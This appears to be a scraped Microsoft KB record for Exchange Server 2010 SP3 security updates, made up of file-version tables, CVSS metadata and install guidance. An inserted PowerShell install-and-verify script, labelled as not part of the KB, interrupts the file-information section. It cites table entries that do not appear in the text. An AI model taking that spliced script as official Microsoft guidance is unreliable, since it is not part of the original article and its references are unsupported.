8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVsindd.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVsinx.dll| 8.5.3.76| 21,344| 11-Nov-2020| 21:24| x64 \nVsiwok.dll| 8.5.3.76| 36,704| 11-Nov-2020| 21:24| x64 \nVsiwok13.dll| 8.5.3.76| 1,409,384| 11-Nov-2020| 21:24| x64 \nVsiwon.dll| 8.5.3.76| 70,496| 11-Nov-2020| 21:24| x64 \nVsiwop.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsiwp.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsjbg2.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsjp2.dll| 8.5.3.76| 249,184| 11-Nov-2020| 21:24| x64 \nVsjw.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsleg.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64 \nVslwp7.dll| 8.5.3.76| 360,288| 11-Nov-2020| 21:24| x64 \nVslzh.dll| 8.5.3.76| 41,824| 11-Nov-2020| 21:24| x64 \nVsm11.dll| 8.5.3.76| 28,512| 11-Nov-2020| 21:24| x64 \nVsmanu.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsmbox.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVsmcw.dll| 8.5.3.76| 44,384| 11-Nov-2020| 21:24| x64 \nVsmdb.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVsmif.dll| 8.5.3.76| 217,952| 11-Nov-2020| 21:24| x64 \nVsmime.dll| 8.5.3.76| 135,008| 11-Nov-2020| 21:24| x64 \nVsmm.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsmm4.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsmmfn.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsmp.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsmpp.dll| 8.5.3.76| 249,696| 11-Nov-2020| 21:24| x64 \nVsmsg.dll| 8.5.3.76| 96,096| 11-Nov-2020| 21:24| x64 \nVsmsw.dll| 8.5.3.76| 46,432| 11-Nov-2020| 21:24| x64 \nVsmwkd.dll| 8.5.3.76| 26,464| 11-Nov-2020| 21:24| x64 \nVsmwks.dll| 8.5.3.76| 25,440| 11-Nov-2020| 21:24| x64 \nVsmwp2.dll| 8.5.3.76| 49,504| 11-Nov-2020| 21:24| x64 \nVsmwpf.dll| 8.5.3.76| 34,656| 11-Nov-2020| 21:24| x64 \nVsmwrk.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVsnsf.dll| 8.5.3.76| 38,240| 11-Nov-2020| 21:24| x64 \nVsolm.dll| 8.5.3.76| 153,952| 11-Nov-2020| 21:24| x64 \nVsone.dll| 8.5.3.76| 81,760| 11-Nov-2020| 21:24| x64 
\nVsow.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVspbm.dll| 8.5.3.76| 24,928| 11-Nov-2020| 21:24| x64 \nVspcl.dll| 8.5.3.76| 23,392| 11-Nov-2020| 21:24| x64 \nVspcx.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVspdf.dll| 8.5.3.76| 260,448| 11-Nov-2020| 21:24| x64 \nVspdfi.dll| 8.5.3.76| 278,368| 11-Nov-2020| 21:24| x64 \nVspdx.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVspfs.dll| 8.5.3.76| 41,312| 11-Nov-2020| 21:24| x64 \nVspgl.dll| 8.5.3.76| 59,744| 11-Nov-2020| 21:24| x64 \nVspic.dll| 8.5.3.76| 25,440| 11-Nov-2020| 21:24| x64 \nVspict.dll| 8.5.3.76| 55,136| 11-Nov-2020| 21:24| x64 \nVspng.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVspntg.dll| 8.5.3.76| 22,880| 11-Nov-2020| 21:24| x64 \nVspp12.dll| 8.5.3.76| 131,936| 11-Nov-2020| 21:24| x64 \nVspp2.dll| 8.5.3.76| 72,032| 11-Nov-2020| 21:24| x64 \nVspp7.dll| 8.5.3.76| 77,664| 11-Nov-2020| 21:24| x64 \nVspp97.dll| 8.5.3.76| 227,680| 11-Nov-2020| 21:24| x64 \nVsppl.dll| 8.5.3.76| 39,264| 11-Nov-2020| 21:24| x64 \nVspsd.dll| 8.5.3.76| 23,904| 11-Nov-2020| 21:24| x64 \nVspsp6.dll| 8.5.3.76| 189,792| 11-Nov-2020| 21:24| x64 \nVspst.dll| 8.5.3.76| 82,272| 11-Nov-2020| 21:24| x64 \nVspstf.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsqa.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsqad.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsqp6.dll| 8.5.3.76| 53,600| 11-Nov-2020| 21:24| x64 \nVsqp9.dll| 8.5.3.76| 76,128| 11-Nov-2020| 21:24| x64 \nVsqt.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsrar.dll| 8.5.3.76| 141,152| 11-Nov-2020| 21:24| x64 \nVsras.dll| 8.5.3.76| 24,416| 11-Nov-2020| 21:24| x64 \nVsrbs.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVsrft.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVsrfx.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsriff.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVsrtf.dll| 8.5.3.76| 171,872| 11-Nov-2020| 21:24| x64 \nVssam.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVssc5.dll| 8.5.3.76| 32,608| 11-Nov-2020| 21:24| x64 
\nVssdw.dll| 8.5.3.76| 29,536| 11-Nov-2020| 21:24| x64 \nVsshw3.dll| 8.5.3.76| 40,288| 11-Nov-2020| 21:24| x64 \nVssmd.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nVssms.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVssmt.dll| 8.5.3.76| 33,632| 11-Nov-2020| 21:24| x64 \nVssnap.dll| 8.5.3.76| 31,072| 11-Nov-2020| 21:24| x64 \nVsso6.dll| 8.5.3.76| 306,016| 11-Nov-2020| 21:24| x64 \nVssoc.dll| 8.5.3.76| 43,360| 11-Nov-2020| 21:24| x64 \nVssoc6.dll| 8.5.3.76| 285,536| 11-Nov-2020| 21:24| x64 \nVssoi.dll| 8.5.3.76| 40,800| 11-Nov-2020| 21:24| x64 \nVssoi6.dll| 8.5.3.76| 304,992| 11-Nov-2020| 21:24| x64 \nVssow.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVsspt.dll| 8.5.3.76| 28,000| 11-Nov-2020| 21:24| x64 \nVsssml.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsswf.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVstaz.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVstext.dll| 8.5.3.76| 35,168| 11-Nov-2020| 21:24| x64 \nVstga.dll| 8.5.3.76| 26,976| 11-Nov-2020| 21:24| x64 \nVstif6.dll| 8.5.3.76| 103,776| 11-Nov-2020| 21:24| x64 \nVstw.dll| 8.5.3.76| 34,144| 11-Nov-2020| 21:24| x64 \nVstxt.dll| 8.5.3.76| 38,752| 11-Nov-2020| 21:24| x64 \nVsvcrd.dll| 8.5.3.76| 82,272| 11-Nov-2020| 21:24| x64 \nVsviso.dll| 8.5.3.76| 205,664| 11-Nov-2020| 21:24| x64 \nVsvsdx.dll| 8.5.3.76| 47,456| 11-Nov-2020| 21:24| x64 \nVsvw3.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsw12.dll| 8.5.3.76| 221,536| 11-Nov-2020| 21:24| x64 \nVsw6.dll| 8.5.3.76| 138,080| 11-Nov-2020| 21:24| x64 \nVsw97.dll| 8.5.3.76| 236,896| 11-Nov-2020| 21:24| x64 \nVswbmp.dll| 8.5.3.76| 22,368| 11-Nov-2020| 21:24| x64 \nVswg2.dll| 8.5.3.76| 47,968| 11-Nov-2020| 21:24| x64 \nVswk4.dll| 8.5.3.76| 103,264| 11-Nov-2020| 21:24| x64 \nVswk6.dll| 8.5.3.76| 154,464| 11-Nov-2020| 21:24| x64 \nVswks.dll| 8.5.3.76| 48,480| 11-Nov-2020| 21:24| x64 \nVswm.dll| 8.5.3.76| 30,048| 11-Nov-2020| 21:24| x64 \nVswmf.dll| 8.5.3.76| 45,920| 11-Nov-2020| 21:24| x64 \nVswml.dll| 8.5.3.76| 68,960| 11-Nov-2020| 21:24| x64 
\nVsword.dll| 8.5.3.76| 86,880| 11-Nov-2020| 21:24| x64 \nVswork.dll| 8.5.3.76| 36,192| 11-Nov-2020| 21:24| x64 \nVswp5.dll| 8.5.3.76| 75,616| 11-Nov-2020| 21:24| x64 \nVswp6.dll| 8.5.3.76| 107,360| 11-Nov-2020| 21:24| x64 \nVswpf.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVswpg.dll| 8.5.3.76| 48,480| 11-Nov-2020| 21:24| x64 \nVswpg2.dll| 8.5.3.76| 57,184| 11-Nov-2020| 21:24| x64 \nVswpl.dll| 8.5.3.76| 39,264| 11-Nov-2020| 21:24| x64 \nVswpml.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVswpw.dll| 8.5.3.76| 68,448| 11-Nov-2020| 21:24| x64 \nVsws.dll| 8.5.3.76| 37,728| 11-Nov-2020| 21:24| x64 \nVsws2.dll| 8.5.3.76| 29,024| 11-Nov-2020| 21:24| x64 \nVsxl12.dll| 8.5.3.76| 261,472| 11-Nov-2020| 21:24| x64 \nVsxl5.dll| 8.5.3.76| 289,632| 11-Nov-2020| 21:24| x64 \nVsxlsb.dll| 8.5.3.76| 244,064| 11-Nov-2020| 21:24| x64 \nVsxml.dll| 8.5.3.76| 31,584| 11-Nov-2020| 21:24| x64 \nVsxmp.dll| 8.5.3.76| 22,368| 11-Nov-2020| 21:24| x64 \nVsxps.dll| 8.5.3.76| 51,552| 11-Nov-2020| 21:24| x64 \nVsxy.dll| 8.5.3.76| 35,680| 11-Nov-2020| 21:24| x64 \nVsyim.dll| 8.5.3.76| 30,560| 11-Nov-2020| 21:24| x64 \nVszip.dll| 8.5.3.76| 27,488| 11-Nov-2020| 21:24| x64 \nWatson.config.xml| Not applicable| 37,834| 11-Nov-2020| 21:23| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 143,640| 11-Nov-2020| 21:22| Not applicable \nWeb.config_cb9a6ac9d1164e879b0b2887c9452d4f| Not applicable| 137,151| 11-Nov-2020| 21:23| Not applicable \nWebreadyview.aspx| Not applicable| 1,061| 11-Nov-2020| 21:23| Not applicable \nWebreadyviewbody.aspx| Not applicable| 1,292| 11-Nov-2020| 21:23| Not applicable \nWebreadyviewhead.aspx| Not applicable| 7,406| 11-Nov-2020| 21:23| Not applicable \nWizardproperties.js| Not applicable| 189,547| 11-Nov-2020| 21:20| Not applicable \nWizcmd.exe| 14.3.498.0| 22,992| 11-Nov-2020| 21:23| x86 \nWsbexchange.exe| 14.3.509.0| 124,304| 11-Nov-2020| 21:20| x64 \nWvcore.dll| 8.5.3.76| 3,251,040| 11-Nov-2020| 21:24| x64 \nX400prox.dll| 14.3.498.0| 
98,192| 11-Nov-2020| 21:19| x64 \n_02bdcebd3d694db585f8e38f74a7767e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_083c0d59e0a749f2b10174c00cb6727e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_24d2e35f00d7423c902e58d04c126642_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_3184a6f4759943848cf58593791ac971_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_3539f8afe1684c36847f808f0c76d024_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_486632cb7cbe412b8a2954012f7e9c7f_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_50ca03193abf48aca295b3ec864fcd68_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_545db0f907844150956a0c069a3a0556_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_5e224a55a0fa465e817e18cec8854723_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_64f60ad194cd4344bca49df649ac7b36_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_68e440eb9ffa4b54b3d7490524f7f878_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_6b0d5c59049a498aa09173d08300a443_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_71a730c62e764989bd2b2d205dd874b4_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_756c11efe6574dba874273443609eb8b_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_791aef9789df465da46941ee38757a31_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_7b9793f8_5acd_4ef8_83a6_46e957c909a0_error.aspx| Not applicable| 8,363| 11-Nov-2020| 21:24| Not applicable \n_7e3dc44156954eacac20b5767cd0ebd7_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_81ebbb77ed854ee784951876098c52e9_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable 
\n_9495e7eba02649c6a26bea7209a2f1e1_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n_9e665be76e144ac89a7d8b37611b752e_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \n \nHow to get help and support for this security updateProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-08T08:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2010 Service Pack 3: December 8, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2020-12-08T08:00:00", "id": "KB4593467", "href": "https://support.microsoft.com/en-us/help/4593467", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:28:26", "description": "None\nThis update rollup is a security update that provides a security advisory in Microsoft Exchange. 
To learn more about this vulnerability, see the following Common Vulnerabilities and Exposures (CVE) entry:

 * [CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688>)

This update also fixes the following issue: 4540267 MSExchangeDelivery.exe or EdgeTransport.exe crashes in Exchange Server 2013 and Exchange Server 2010.

## Known issues in this security update

 * When you try to manually install this security update by double-clicking the update file (.msp) to run it in "Normal mode" (that is, not as an administrator), some files are not correctly updated. When this issue occurs, you don’t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that use User Account Control (UAC), because the security update doesn’t correctly stop certain Exchange-related services. To avoid this issue, follow these steps to manually install this security update:
   1. Select **Start**, and type **cmd**.
   2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.
   3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.
   4. Type the full path of the .msp file, and then press Enter.

   This issue does not occur when you install the update through Microsoft Update.
 * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. It can occur if the service control scripts experience a problem when they try to return the Exchange services to their usual state. To fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx>).

## How to get and install the update

### Method 1: Microsoft Update

This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).

### Method 2: Microsoft Update Catalog

To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989>) website.

### Method 3: Microsoft Download Center

You can get the standalone update package through the Microsoft Download Center.

 * [Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)](<http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107>)

## Update detail information for Exchange Server 2010 SP3

### Installation instructions for Exchange Server 2010 SP3

Learn more about [how to install the latest update rollup for Exchange Server 2010](<http://technet.microsoft.com/library/ff637981.aspx>). Also, learn about the following update installation scenarios.

### Install the update on computers that aren't connected to the internet

When you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:

Creating Native images for .Net assemblies.

This issue is caused by network requests to connect to the following website: [http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl](<http://crl.microsoft.com/pki/crl/products/codesigpca.crl>)

These network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue.

To fix this issue, follow these steps:

 1. In Internet Explorer, select **Internet Options** on the **Tools** menu, and then select **Advanced**.
 2. In the **Security** section, clear the **Check for publisher's certificate revocation** check box, and then select **OK**. **Note** Clear this security option only if the computer is in a tightly controlled environment.
 3. When the Setup process is finished, select the **Check for publisher's certificate revocation** check box again.

### Install the update on computers that have customized Outlook Web App files

**Important** Before you apply this update rollup, make a backup copy of any [customized Outlook Web App](<http://technet.microsoft.com/library/ee633483(exchg.140).aspx>) files.

When you apply an update rollup package, the update process updates the Outlook Web App files, if this is required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.

### Install the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying

If your scenario meets both of the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non-internet-facing CAS:

 * You're a CAS Proxy Deployment Guidance customer.
 * You have deployed [CAS-CAS proxying](<http://technet.microsoft.com/library/bb310763(exchg.140).aspx>).

**Note** For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.

### Install this update on a DBCS version of Windows Server 2012

You can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:

 1. In Control Panel, select **Clock, Region and Language**, select **Region**, and then select **Administrative**.
 2. In the **Language for non-Unicode programs** area, select **Change system locale**.
 3. In the **Current system locale** list, select **English (United States)**, and then select **OK**.

After you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.

### Restart requirement

The required services are restarted automatically after you apply this update rollup.

### Removal information

To remove Update Rollup 30 for Exchange Server 2010 SP3, use the **Add or Remove Programs** item in Control Panel to remove update **KB4536989**.

## More information

### Security update deployment information

For deployment information about this update, see [security update deployment information: February 11, 2020](<https://support.microsoft.com/help/20200211>).

### Security update replacement information

This security update replaces the following previously released update:

 * Description of the security update for Microsoft Exchange Server 2010: July 9, 2019

## File information

### File hash information

Update name| File name| SHA1 hash| SHA256 hash
---|---|---|---
Update Rollup 30 for Exchange Server 2010| Exchange2010-KB4536989-x64-en.msp| 2DD3EB1C737743941FB56293BB9A68242F0F52E2| 95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4

### Exchange Server file information

The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias.
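The two known issues above (a non-elevated install silently skips files, and the service-control scripts can leave Exchange services Disabled) and the hash and file tables in this section can be turned into one pre- and post-install check. The script below is an added example, not part of the KB article and not Microsoft tooling. It assumes PowerShell 4 or later on the Exchange 2010 SP3 server (for Get-FileHash), that the rollup has already been downloaded to the path passed in -Msp
Path, and that Exchange setup populated the ExchangeInstallPath environment variable; the expected SHA256 and the 14.3.470.0 file versions it checks are taken from the tables on this page.

```powershell
# Added example, not part of the KB article or of Microsoft's tooling.
# Verifies the rollup package against the SHA256 published in the File hash
# table, installs it from an elevated session (the Known issues section warns
# that a non-elevated install silently leaves OWA/ECP broken), then puts back
# any Exchange service the update left Disabled and spot-checks file versions.
# Assumptions: PowerShell 4+ (Get-FileHash), Exchange 2010 SP3 on this host,
# $env:ExchangeInstallPath set by Exchange setup, .msp already downloaded.
param(
    [Parameter(Mandatory = $true)][string]$MspPath,
    # SHA256 of Exchange2010-KB4536989-x64-en.msp from the File hash table above
    [string]$ExpectedSha256 = '95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4',
    [string]$LogPath = "$env:TEMP\KB4536989-install.log"
)

$ErrorActionPreference = 'Stop'

# 1. Integrity: compare the SHA256 (not the SHA1) and refuse to continue on mismatch.
$actual = (Get-FileHash -Path $MspPath -Algorithm SHA256).Hash
if ($actual -ne $ExpectedSha256) {
    throw "Hash mismatch for $MspPath (expected $ExpectedSha256, got $actual)"
}
# Microsoft patch packages are Authenticode-signed; require a valid signature as well.
$sig = Get-AuthenticodeSignature -FilePath $MspPath
if ($sig.Status -ne 'Valid') {
    throw "Authenticode signature on $MspPath is '$($sig.Status)', not 'Valid'"
}

# 2. Known issue 1: the install must run elevated, or some files are silently skipped.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object -TypeName Security.Principal.WindowsPrincipal -ArgumentList $identity
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated (Run as administrator) PowerShell session.'
}

# 3. Snapshot Exchange service start modes and states before the install, so the
#    repair step restores what was configured instead of forcing everything to Automatic.
$before = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'MSExchange%'" |
    Select-Object Name, StartMode, State

# 4. Install the patch package unattended, keeping a verbose log for the change record.
$msiArgs = "/update `"$MspPath`" /quiet /norestart /l*v `"$LogPath`""
$proc = Start-Process -FilePath msiexec.exe -ArgumentList $msiArgs -Wait -PassThru
if (@(0, 3010) -notcontains $proc.ExitCode) {        # 3010 = success, reboot required
    throw "msiexec exited with $($proc.ExitCode); see $LogPath"
}

# 5. Known issue 2: services left Disabled by the service-control scripts.
foreach ($svc in $before) {
    $now = Get-WmiObject -Class Win32_Service -Filter "Name='$($svc.Name)'"
    if ($now.StartMode -eq 'Disabled' -and $svc.StartMode -ne 'Disabled') {
        # Win32_Service reports 'Auto'; Set-Service expects 'Automatic'.
        $mode = if ($svc.StartMode -eq 'Auto') { 'Automatic' } else { $svc.StartMode }
        Set-Service -Name $svc.Name -StartupType $mode
        Write-Warning "Restored start type of $($svc.Name) to $mode"
    }
    if ($svc.State -eq 'Running' -and (Get-Service -Name $svc.Name).Status -ne 'Running') {
        Start-Service -Name $svc.Name
    }
}

# 6. Spot-check that binaries from the Update Rollup 30 file table on this page
#    reached the listed version (names and versions taken from that table).
$expected = @{ 'Abv_dg.dll' = [version]'14.3.470.0'; 'Airfilter.dll' = [version]'14.3.470.0' }
foreach ($name in $expected.Keys) {
    $file = Get-ChildItem -Path $env:ExchangeInstallPath -Filter $name -Recurse -File |
        Select-Object -First 1
    if (-not $file) { Write-Warning "$name not found under $env:ExchangeInstallPath"; continue }
    $vi  = $file.VersionInfo
    $ver = New-Object -TypeName Version -ArgumentList $vi.FileMajorPart, $vi.FileMinorPart, $vi.FileBuildPart, $vi.FilePrivatePart
    if ($ver -lt $expected[$name]) {
        Write-Warning "$name is $ver; expected at least $($expected[$name])"
    } else {
        Write-Host "$name $ver OK"
    }
}
```

Run it from an elevated PowerShell session, for example `.\Install-KB4536989.ps1 -MspPath C:\Patches\Exchange2010-KB4536989-x64-en.msp`. Two design choices differ from the KB's one-line advice: the hash check uses the SHA256 column rather than SHA1, and the service repair restores each service to the start mode recorded before the install rather than setting every MSExchange* service to Automatic, so a service that was deliberately Manual stays Manual.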
Additionally, the dates and times may change when you perform certain operations on the files.
\nMicrosoft.exchange.storeprovider.dll| 14.3.470.0| 859,784| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.structuredquery.dll| 14.3.470.0| 159,944| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 14.3.470.0| 29,320| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.headerconversion.dll| 14.3.470.0| 26,248| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 14.3.470.0| 233,096| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 14.3.470.0| 23,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 14.3.470.0| 44,680| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 14.3.470.0| 65,160| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 14.3.470.0| 73,352| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 14.3.487.0| 57,040| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.dll| 14.3.487.0| 1,916,624| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.eventlog.dll| 14.3.470.0| 104,368| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.logging.search.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.transport.sync.common.dll| 14.3.487.0| 442,064| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 14.3.470.0| 18,888| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transport.sync.worker.dll| 14.3.487.0| 1,072,848| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 14.3.470.0| 21,936| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.clientstrings.dll| 14.3.470.0| 77,448| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.lad.dll| 14.3.470.0| 123,528| 
03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.um.prompts.dll| 14.3.470.0| 212,616| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 14.3.470.0| 102,024| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 14.3.487.0| 188,112| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcommon.dll| 14.3.487.0| 765,856| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.um.umcore.dll| 14.3.487.0| 1,384,144| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 14.3.470.0| 108,976| 03-Jan-2020| 05:46| x64 \nMicrosoft.managementgui.dll| 14.3.470.0| 155,336| 03-Jan-2020| 05:45| x86 \nMicrosoft.powershell.hostingtools.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:48| x86 \nMicrosoft.powershell.hostingtools_2.dll| 14.3.470.0| 89,800| 03-Jan-2020| 05:45| x86 \nMigbase.dll| 14.3.470.0| 783,792| 03-Jan-2020| 05:48| x64 \nMigmsg.dll| 14.3.470.0| 91,560| 03-Jan-2020| 05:46| x64 \nMigrateumcustomprompts.ps1| Not applicable| 16,986| 03-Jan-2020| 05:47| Not applicable \nMoveallreplicas.ps1| Not applicable| 13,043| 03-Jan-2020| 05:47| Not applicable \nMovemailbox.ps1| Not applicable| 56,868| 03-Jan-2020| 05:47| Not applicable \nMovetransportdatabase.ps1| Not applicable| 28,466| 03-Jan-2020| 05:47| Not applicable \nMsallog.dll| 14.3.470.0| 